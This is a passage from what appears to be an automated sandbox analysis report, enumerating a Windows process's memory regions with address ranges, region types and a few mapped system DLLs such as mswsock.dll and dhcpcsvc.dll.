"pagefile_0x00000000003c0000" filename = "" Region: id = 566 start_va = 0x3c0000 end_va = 0x3cdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003c0000" filename = "" Region: id = 567 start_va = 0x3c0000 end_va = 0x3cdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003c0000" filename = "" Region: id = 568 start_va = 0x3c0000 end_va = 0x3cdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003c0000" filename = "" Region: id = 569 start_va = 0x3c0000 end_va = 0x3cdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003c0000" filename = "" Region: id = 570 start_va = 0x3c0000 end_va = 0x3cdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003c0000" filename = "" Region: id = 571 start_va = 0x3c0000 end_va = 0x3cdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003c0000" filename = "" Region: id = 572 start_va = 0x3c0000 end_va = 0x3cdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003c0000" filename = "" Region: id = 573 start_va = 0x3c0000 end_va = 0x3cdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003c0000" filename = "" Region: id = 574 start_va = 0x3c0000 end_va = 0x3cdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003c0000" filename = "" Region: id = 575 start_va = 0x3c0000 end_va = 0x3cdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003c0000" filename = "" Region: id = 576 start_va = 0x3c0000 end_va = 0x3cdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003c0000" filename = "" Region: id = 577 start_va = 0x3c0000 end_va = 0x3cdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003c0000" filename = "" Region: id = 578 start_va = 0x3c0000 end_va = 0x3cdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003c0000" filename = "" Region: id = 579 start_va = 0x3c0000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000003c0000" filename = "" Region: id = 580 start_va = 0x2510000 end_va = 0x260ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002510000" filename = "" Region: id = 581 start_va = 0x72290000 end_va = 0x7229cfff monitored = 0 entry_point = 0x722912d0 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\SysWOW64\\browcli.dll" (normalized: "c:\\windows\\syswow64\\browcli.dll") Region: id = 582 start_va = 0x7efad000 end_va = 0x7efaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efad000" filename = "" Region: id = 596 start_va = 0x3940000 end_va = 0x3b3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003940000" filename = "" Region: id = 597 start_va = 0x3b40000 end_va = 0x3b4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003b40000" filename = "" Region: id = 598 start_va = 0x3b40000 end_va = 0x3b53fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003b40000" filename = "" Region: id = 599 start_va = 0x3b60000 end_va = 0x3b6dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003b60000" filename = "" Region: id = 600 start_va = 0x3b40000 end_va = 0x3b4dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003b40000" filename = "" Region: id = 601 start_va = 0x3b40000 end_va = 0x3b4dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003b40000" filename = "" Region: id = 602 start_va = 0x3b40000 end_va = 0x3b4dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003b40000" filename = "" Region: id = 603 start_va = 0x3b40000 end_va = 0x3b4dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003b40000" filename = "" Region: id = 604 start_va = 0x3b40000 end_va = 0x3b4dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003b40000" filename = "" Region: id = 605 start_va = 0x3b40000 end_va = 0x3b4dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003b40000" filename = "" Region: id = 606 start_va = 0x3b40000 end_va = 0x3b4dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003b40000" filename = "" Region: id = 607 start_va = 0x3b40000 end_va = 0x3b4dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003b40000" filename = "" Region: id = 608 start_va = 0x3b40000 end_va = 0x3b4dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003b40000" filename = "" Region: id = 609 start_va = 0x3b40000 end_va = 0x3b4dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003b40000" filename = "" Region: id = 610 start_va = 0x3b40000 end_va = 0x3b4dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003b40000" filename = "" Region: id = 611 start_va = 0x3b40000 end_va = 0x3b4dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003b40000" filename = "" Region: id = 612 start_va = 0x3b40000 end_va = 0x3b4dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003b40000" filename = "" Region: id = 613 start_va = 0x3b40000 end_va = 0x3b4dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003b40000" filename = "" Region: id = 614 start_va = 0x3b40000 end_va = 0x3b4dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003b40000" filename = "" Region: id = 615 start_va = 0x3b40000 end_va = 0x3b4dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003b40000" filename = "" Region: id = 616 start_va = 0x3b40000 end_va = 0x3b4dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003b40000" filename = "" Region: id = 714 start_va = 0x72270000 end_va = 0x72281fff monitored = 0 entry_point = 0x72273271 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\SysWOW64\\dhcpcsvc.dll" (normalized: "c:\\windows\\syswow64\\dhcpcsvc.dll") Region: id = 715 start_va = 0x3b40000 end_va = 0x3bfffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\kernelbase.dll.mui") Region: id = 716 start_va = 0x3c00000 end_va = 0x3c3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003c00000" filename = "" Region: id = 717 start_va = 0x3c40000 end_va = 0x3d3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003c40000" filename = "" Region: id = 718 start_va = 0x7ef7a000 end_va = 0x7ef7cfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ef7a000" filename = "" Region: id = 719 start_va = 0x3d40000 end_va = 0x3d4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d40000" filename = "" Region: id = 720 start_va = 0x3d50000 end_va = 0x3d54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003d50000" filename = "" Region: id = 721 start_va = 0x3d40000 end_va = 0x3d44fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003d40000" filename = "" Region: id = 722 start_va = 0x3d40000 end_va = 0x3d44fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003d40000" filename = "" Region: id = 723 start_va = 0x3d40000 end_va = 0x3d44fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003d40000" filename = "" Region: id = 724 start_va = 0x3d40000 end_va = 0x3d44fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003d40000" filename = "" Region: id = 725 start_va = 0x3d40000 end_va = 0x3d44fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003d40000" filename = "" Region: id = 726 start_va = 0x3d40000 end_va = 0x3d44fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003d40000" filename = "" Region: id = 727 start_va = 0x3d40000 end_va = 0x3d44fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003d40000" filename = "" Region: id = 728 start_va = 0x3d40000 end_va = 0x3d44fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003d40000" filename = "" Region: id = 729 start_va = 0x3d40000 end_va = 0x3d44fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003d40000" filename = "" Region: id = 730 start_va = 0x3d40000 end_va = 0x3d44fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003d40000" filename = "" Region: id = 731 start_va = 0x3d40000 end_va = 0x3d44fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003d40000" filename = "" Region: id = 732 start_va = 0x3d40000 end_va = 0x3d44fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003d40000" filename = "" Region: id = 733 start_va = 0x3d40000 end_va = 0x3d44fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003d40000" filename = "" Region: id = 734 start_va = 0x3d40000 end_va = 0x3d44fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003d40000" filename = "" Region: id = 735 start_va = 0x3d40000 end_va = 0x3d44fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003d40000" filename = "" Region: id = 736 start_va = 0x3d40000 end_va = 0x3d44fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003d40000" filename = "" Region: id = 737 start_va = 0x3d40000 end_va = 0x3d44fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003d40000" filename = "" Region: id = 738 start_va = 0x3d40000 end_va = 0x3d7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d40000" filename = "" Region: id = 739 start_va = 0x3d80000 end_va = 0x3e7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d80000" filename = "" Region: id = 740 start_va = 0x3e80000 end_va = 0x3ebffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003e80000" filename = "" Region: id = 741 start_va = 0x3ec0000 end_va = 0x3fbffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003ec0000" filename = "" Region: id = 742 start_va = 0x3fc0000 end_va = 0x3ffffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003fc0000" filename = "" Region: id = 743 start_va = 0x4000000 end_va = 0x40fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004000000" filename = "" Region: id = 744 start_va = 0x4100000 end_va = 0x413ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004100000" filename = "" Region: id = 745 start_va = 0x4140000 end_va = 0x423ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 746 start_va = 0x4240000 end_va = 0x427ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004240000" filename = "" Region: id = 747 start_va = 0x4280000 end_va = 0x437ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004280000" filename = "" Region: id = 748 start_va = 0x4380000 end_va = 0x43bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004380000" filename = "" Region: id = 749 start_va = 0x43c0000 end_va = 0x44bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000043c0000" filename = "" Region: id = 750 start_va = 0x44c0000 end_va = 0x44fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000044c0000" filename = "" Region: id = 751 start_va = 0x4500000 end_va = 0x45fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004500000" filename = "" Region: id = 752 start_va = 0x4600000 end_va = 0x463ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004600000" filename = "" Region: id = 753 start_va = 0x4640000 end_va = 0x473ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004640000" filename = "" Region: id = 754 start_va = 0x4740000 end_va = 0x477ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004740000" filename = "" Region: id = 755 start_va = 0x4780000 end_va = 0x487ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004780000" filename = "" Region: id = 756 start_va = 0x4880000 end_va = 0x48bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004880000" filename = "" Region: id = 757 start_va = 0x48c0000 end_va = 0x49bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000048c0000" filename = "" Region: id = 758 start_va = 0x49c0000 end_va = 0x49fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000049c0000" filename = "" Region: id = 759 start_va = 0x4a00000 end_va = 0x4afffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004a00000" filename = "" Region: id = 760 start_va = 0x4b00000 end_va = 0x4b3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004b00000" filename = "" Region: id = 761 start_va = 0x4b40000 end_va = 0x4c3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004b40000" filename = "" Region: id = 762 start_va = 0x4c40000 end_va = 0x4c7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004c40000" filename = "" Region: id = 763 start_va = 0x4c80000 end_va = 0x4d7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004c80000" filename = "" Region: id = 764 start_va = 0x4d80000 end_va = 0x4dbffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004d80000" filename = "" Region: id = 765 start_va = 0x4dc0000 end_va = 0x4ebffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004dc0000" filename = "" Region: id = 766 start_va = 0x4ec0000 end_va = 0x4efffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004ec0000" filename = "" Region: id = 767 start_va = 0x4f00000 end_va = 0x4ffffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004f00000" filename = "" Region: id = 768 start_va = 0x5000000 end_va = 0x503ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005000000" filename = "" Region: id = 769 start_va = 0x5040000 end_va = 0x513ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005040000" filename = "" Region: id = 770 start_va = 0x5140000 end_va = 0x517ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005140000" filename = "" Region: id = 771 start_va = 0x5180000 end_va = 0x527ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005180000" filename = "" Region: id = 772 start_va = 0x5280000 end_va = 0x52bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005280000" filename = "" Region: id = 773 start_va = 0x52c0000 end_va = 0x53bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000052c0000" filename = "" Region: id = 774 start_va = 0x53c0000 end_va = 0x53fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000053c0000" filename = "" Region: id = 775 start_va = 0x5400000 end_va = 0x54fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005400000" filename = "" Region: id = 776 start_va = 0x5500000 end_va = 0x553ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005500000" filename = "" Region: id = 777 start_va = 0x5540000 end_va = 0x563ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005540000" filename = "" Region: id = 778 start_va = 0x5640000 end_va = 0x567ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005640000" filename = "" Region: id = 779 start_va = 0x5680000 end_va = 0x577ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005680000" filename = "" Region: id = 780 start_va = 0x5780000 end_va = 0x57bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005780000" filename = "" Region: id = 781 start_va = 0x57c0000 end_va = 0x58bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000057c0000" filename = "" Region: id = 782 start_va = 0x58c0000 end_va = 0x58fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000058c0000" filename = "" Region: id = 783 start_va = 0x5900000 end_va = 0x59fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005900000" filename = "" Region: id = 784 start_va = 0x7ef35000 end_va = 0x7ef37fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ef35000" filename = "" Region: id = 785 start_va = 0x7ef38000 end_va = 0x7ef3afff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ef38000" filename = "" Region: id = 786 start_va = 0x7ef3b000 end_va = 0x7ef3dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ef3b000" filename = "" Region: id = 787 start_va = 0x7ef3e000 end_va = 0x7ef40fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ef3e000" filename = "" Region: id = 788 start_va = 0x7ef41000 end_va = 0x7ef43fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ef41000" filename = "" Region: id = 789 start_va = 0x7ef44000 end_va = 0x7ef46fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ef44000" filename = "" Region: id = 790 start_va = 0x7ef47000 end_va = 0x7ef49fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ef47000" filename = "" Region: id = 791 start_va = 0x7ef4a000 end_va = 0x7ef4cfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ef4a000" filename = "" Region: id = 792 start_va = 0x7ef4d000 end_va = 0x7ef4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ef4d000" filename = "" Region: id = 793 start_va = 0x7ef50000 end_va = 0x7ef52fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ef50000" filename = "" Region: id = 794 start_va = 0x7ef53000 end_va = 0x7ef55fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ef53000" filename = "" Region: id = 795 start_va = 0x7ef56000 end_va = 0x7ef58fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ef56000" filename = "" Region: id = 796 start_va = 0x7ef59000 end_va = 0x7ef5bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ef59000" filename = "" Region: id = 797 start_va = 0x7ef5c000 end_va = 0x7ef5efff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ef5c000" filename = "" Region: id = 798 start_va = 0x7ef5f000 end_va = 0x7ef61fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ef5f000" filename = "" Region: id = 799 start_va = 0x7ef62000 end_va = 0x7ef64fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ef62000" filename = "" Region: id = 800 start_va = 0x7ef65000 end_va = 0x7ef67fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ef65000" filename = "" Region: id = 801 start_va = 0x7ef68000 end_va = 0x7ef6afff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ef68000" filename = "" Region: id = 802 start_va = 0x7ef6b000 end_va = 0x7ef6dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ef6b000" filename = "" Region: id = 803 start_va = 0x7ef6e000 end_va = 0x7ef70fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ef6e000" filename = "" Region: id = 804 start_va = 0x7ef71000 end_va = 0x7ef73fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ef71000" filename = "" Region: id = 805 start_va = 0x7ef74000 end_va = 0x7ef76fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ef74000" filename = "" Region: id = 806 start_va = 0x7ef77000 end_va = 0x7ef79fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ef77000" filename = "" Region: id = 807 start_va = 0x5a00000 end_va = 0x5a0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005a00000" filename = "" Region: id = 808 start_va = 0x5a10000 end_va = 0x5a14fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005a10000" filename = "" Region: id = 809 start_va = 0x5a00000 end_va = 0x5a04fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005a00000" filename = "" Region: id = 810 start_va = 0x5a00000 end_va = 0x5a04fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005a00000" filename = "" Region: id = 811 start_va = 0x5a00000 end_va = 0x5a04fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005a00000" filename = "" Region: id = 812 start_va = 0x5a00000 end_va = 0x5a04fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005a00000" filename = "" Region: id = 813 start_va = 0x5a00000 end_va = 0x5a04fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005a00000" filename = "" Region: id = 814 start_va = 0x5a00000 end_va = 0x5a04fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005a00000" filename = "" Region: id = 815 start_va = 0x5a00000 end_va = 0x5a04fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005a00000" filename = "" Region: id = 816 start_va = 0x5a00000 end_va = 0x5a04fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005a00000" filename = "" Region: id = 817 start_va = 0x5a00000 end_va = 0x5a04fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005a00000" filename = "" Region: id = 818 start_va = 0x5a00000 end_va = 0x5a04fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005a00000" filename = "" Region: id = 819 start_va = 0x5a00000 end_va = 0x5a04fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005a00000" filename = "" Region: id = 820 start_va = 0x5a00000 end_va = 0x5a04fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005a00000" filename = "" Region: id = 821 start_va = 0x5a00000 end_va = 0x5a04fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005a00000" filename = "" Region: id = 822 start_va = 0x5a00000 end_va = 0x5a04fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005a00000" filename = "" Region: id = 823 start_va = 0x5a00000 end_va = 0x5a04fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005a00000" filename = "" Region: id = 824 start_va = 0x5a00000 end_va = 0x5a04fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005a00000" filename = "" Region: id = 825 start_va = 0x5a00000 end_va = 0x5a04fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005a00000" filename = "" Region: id = 826 start_va = 0x5a00000 end_va = 0x5a3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005a00000" filename = "" Region: id = 827 start_va = 0x5a40000 end_va = 0x5b3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005a40000" filename = "" Region: id = 828 start_va = 0x74c40000 end_va = 0x74c7bfff monitored = 0 entry_point = 0x74c4145d region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\SysWOW64\\mswsock.dll" (normalized: "c:\\windows\\syswow64\\mswsock.dll") Region: id = 829 start_va = 0x7ef32000 end_va = 0x7ef34fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ef32000" filename = "" Region: id = 830 start_va = 0x5b40000 end_va = 0x5b7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005b40000" filename = "" Region: id = 831 start_va = 0x5b80000 end_va = 0x5c7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005b80000" filename = "" Region: id = 832 start_va = 0x5c80000 end_va = 0x5cbffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005c80000" filename = "" Region: id = 833 start_va = 0x5cc0000 end_va = 0x5dbffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005cc0000" filename = "" Region: id = 834 start_va = 0x5dc0000 end_va = 0x5dfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005dc0000" filename = "" Region: id = 835 start_va = 0x5e00000 end_va = 0x5efffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005e00000" filename = "" Region: id = 836 start_va = 0x5f00000 end_va = 0x5f3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005f00000" filename = "" Region: id = 837 start_va = 0x5f40000 end_va = 0x603ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005f40000" filename = "" Region: id = 838 start_va = 0x6040000 end_va = 0x607ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006040000" filename = "" Region: id = 839 start_va = 0x6080000 end_va = 0x617ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006080000" filename = "" Region: id = 840 start_va = 0x6180000 end_va = 0x61bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006180000" filename = "" Region: id = 841 start_va = 0x61c0000 end_va = 0x62bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000061c0000" filename = "" Region: id = 842 start_va = 0x62c0000 end_va = 0x62fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000062c0000" filename = "" Region: id = 843 start_va = 0x6300000 end_va = 0x63fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006300000" filename = "" Region: id = 844 start_va = 0x6400000 end_va = 0x643ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006400000" filename = "" Region: id = 845 start_va = 0x6440000 end_va = 0x653ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006440000" filename = "" Region: id = 846 start_va = 0x6540000 end_va = 0x657ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006540000" filename = "" Region: id = 847 start_va = 0x6580000 end_va = 0x667ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006580000" filename = "" Region: id = 848 start_va = 0x6680000 end_va = 0x66bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006680000" filename = "" Region: id = 849 start_va = 0x66c0000 end_va = 0x67bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000066c0000" filename = "" Region: id = 850 start_va = 0x67c0000 end_va = 0x67fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000067c0000" filename = "" Region: id = 851 start_va = 0x6800000 end_va = 0x68fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006800000" filename = "" Region: id = 852 start_va = 0x6900000 end_va = 0x693ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006900000" filename = "" Region: id = 853 start_va = 0x6940000 end_va = 0x6a3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006940000" filename = "" Region: id = 854 start_va = 0x6a40000 end_va = 0x6a7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006a40000" filename = "" Region: id = 855 start_va = 0x6a80000 end_va = 0x6b7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006a80000" filename = "" Region: id = 856 start_va = 0x6b80000 end_va = 0x6bbffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006b80000" filename = "" Region: id = 857 start_va = 0x6bc0000 end_va = 0x6cbffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006bc0000" filename = "" Region: id = 858 start_va = 0x6cc0000 end_va = 0x6cfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006cc0000" filename = "" Region: id = 859 start_va = 0x6d00000 end_va = 0x6dfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006d00000" filename = "" Region: id = 860 start_va = 0x6e00000 end_va = 0x6e3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006e00000" filename = "" Region: id = 861 start_va = 0x6e40000 end_va = 0x6f3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006e40000" filename = "" Region: id = 862 start_va = 0x6f40000 end_va = 0x6f7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006f40000" filename = "" Region: id = 863 start_va = 0x6f80000 end_va = 0x707ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006f80000" filename = "" Region: id = 864 start_va = 0x7080000 end_va = 0x70bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007080000" filename = "" Region: id = 865 start_va = 0x70c0000 end_va = 0x71bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000070c0000" filename = "" Region: id = 866 start_va = 0x71c0000 end_va = 0x71fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000071c0000" filename = "" Region: id = 867 